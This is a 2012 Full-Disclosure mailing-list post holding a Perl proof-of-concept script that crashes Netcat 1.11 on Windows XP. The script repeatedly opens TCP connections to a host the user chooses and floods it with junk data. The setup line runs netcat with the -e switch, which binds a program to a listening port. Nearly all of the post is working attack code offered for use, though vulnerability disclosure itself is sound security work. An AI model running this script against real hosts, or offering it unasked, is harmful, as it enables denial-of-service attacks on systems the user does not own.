# Exploit Title: Netcat 1.11 Crash POC # crash:http://imageshack.us/photo/my-images/687/47003227.jpg/ # Date: July 13, 2012 # Author: coolkaveh # [email protected] # https://twitter.com/coolkaveh # Vendor Homepage: The NT version was written by Weld Pond <[email protected]> # Version: 1.11 # Tested on: windows XP SP3 # set your netcat listening on port 222 with -e switch sftp or etc .. # example nc.exe -l -p 2222 -v -e tftp #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Crappy netcat Crash #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #!/usr/bin/perl -w use IO::Socket; $|=1; sub usage { print "nc.exe -l -p 2222 -v -e tftp"; print "by coolkaveh\n"; print "[email protected]\n"; print "usage: perl nc.pl <host> \n"; } $host=shift; $port=shift || "2222"; if(!defined($host)){ print "nc.exe -l -p 2222 -v -e tftp"; print "by coolkaveh\n"; print "[email protected]\n"; print "usage: perl nc.pl <host> \n"; exit(0); } @junk=('A'x100); print "Crashing NC !\n"; while (1) { COMMAND_LIST: foreach $cmd (@junk){ LABEL5: $sock1=IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>'tcp', Timeout=>30); if(defined($sock1)){ $sock1->send("$cmd"." "."$poc\r\n", 0); } } }
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
